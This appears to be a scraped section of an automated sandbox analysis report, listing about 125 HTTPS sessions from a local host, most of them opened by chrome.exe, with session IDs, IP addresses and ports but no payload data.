                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1421192.168.2.55121590.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1422192.168.2.55121290.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1423192.168.2.55121818.245.199.584434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1424192.168.2.55121390.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1425192.168.2.55121790.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1426192.168.2.55120990.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1427192.168.2.55121690.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1428192.168.2.55121990.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1429192.168.2.55122023.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1430192.168.2.55122190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1431192.168.2.55122490.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1432192.168.2.55122990.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1433192.168.2.55122890.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1434192.168.2.55123123.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1435192.168.2.55123090.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1436192.168.2.55123223.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1437192.168.2.55122243.201.120.1604434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1438192.168.2.55122654.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1439192.168.2.55122343.201.120.1604434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1440192.168.2.55123690.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1441192.168.2.55123590.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1442192.168.2.55122743.201.120.1604434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1443192.168.2.55122543.201.120.1604434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1444192.168.2.55123790.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1445192.168.2.55123343.201.120.1604434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1446192.168.2.55123990.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1447192.168.2.55123890.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1448192.168.2.55124090.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1449192.168.2.551247211.152.148.1094434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1450192.168.2.55124123.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1451192.168.2.55124223.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1452192.168.2.55124490.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1453192.168.2.551243175.6.254.654434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1454192.168.2.551263211.152.148.1094434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1455192.168.2.551262211.152.148.1094434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1456192.168.2.55125090.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1457192.168.2.55124654.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1458192.168.2.55124554.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1459192.168.2.55125123.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1460192.168.2.55125290.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1461192.168.2.55124854.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1462192.168.2.55125623.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1463192.168.2.55125723.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1464192.168.2.55125823.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1465192.168.2.55126023.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1466192.168.2.55126423.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1467192.168.2.551249163.171.128.1484434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1468192.168.2.551254175.6.254.654434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1469192.168.2.55126823.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1470192.168.2.551255175.6.254.654434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1471192.168.2.55126990.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1472192.168.2.55127190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1473192.168.2.55127290.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1474192.168.2.55127090.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1475192.168.2.55127390.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1476192.168.2.55125954.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1477192.168.2.55127623.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1478192.168.2.55126554.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1479192.168.2.55126154.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1480192.168.2.551291211.152.148.1094434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1481192.168.2.55126654.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1482192.168.2.551290211.152.148.1094434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1483192.168.2.551292211.152.148.1094434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1484192.168.2.55128090.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1485192.168.2.55128290.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1486192.168.2.551253103.117.134.214434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1487192.168.2.55128190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1488192.168.2.55128490.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1489192.168.2.55128523.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1490192.168.2.55127554.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1491192.168.2.55128390.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1492192.168.2.55128690.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1493192.168.2.55128790.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1494192.168.2.551289163.171.133.1244434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1495192.168.2.55128823.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1496192.168.2.55126743.201.120.1604434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1497192.168.2.55127854.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1498192.168.2.55127754.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1499192.168.2.551295170.33.9.2274434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1500192.168.2.55127954.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1501192.168.2.55129490.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1502192.168.2.55129390.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1503192.168.2.551296108.157.194.574434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1504192.168.2.55129790.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1505192.168.2.55129890.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1506192.168.2.55129923.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1507192.168.2.55130190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1508192.168.2.55123438.174.148.2344434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1509192.168.2.55130043.201.120.1604434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1510192.168.2.55133990.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1511192.168.2.55133054.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1512192.168.2.55135813.32.99.274434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1513192.168.2.55143723.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1514192.168.2.551402175.6.254.654434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1515192.168.2.55147223.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1516192.168.2.551505170.33.9.2274434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1517192.168.2.55127438.174.148.2354434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1518192.168.2.55152590.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1519192.168.2.55169490.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1520192.168.2.55173290.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1521192.168.2.551815163.181.92.2494434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1522192.168.2.551817188.114.96.34434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1523192.168.2.55181913.32.99.274434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1524192.168.2.551821108.157.194.574434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1525192.168.2.55182223.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1526192.168.2.55182323.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1527192.168.2.55181854.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1528192.168.2.55182890.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1529192.168.2.55183290.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1530192.168.2.551847170.33.9.2274434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1531192.168.2.55184890.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1532192.168.2.55184990.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1533192.168.2.55185090.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1534192.168.2.55181638.174.148.2334434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1535192.168.2.55182038.174.148.2354434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1536192.168.2.551866108.157.194.574434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1537192.168.2.55187013.32.99.274434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1538192.168.2.55187113.32.99.274434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                          1539192.168.2.551874163.181.92.245443
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                          1540192.168.2.551875108.157.194.57443
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1541192.168.2.55187338.174.148.2334434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1542192.168.2.55187238.174.148.2334434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                          1543192.168.2.551878108.157.194.57443
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                          1544192.168.2.55187754.150.37.130443
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                          1545192.168.2.55188354.150.37.130443
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                          1546192.168.2.55188154.150.37.130443
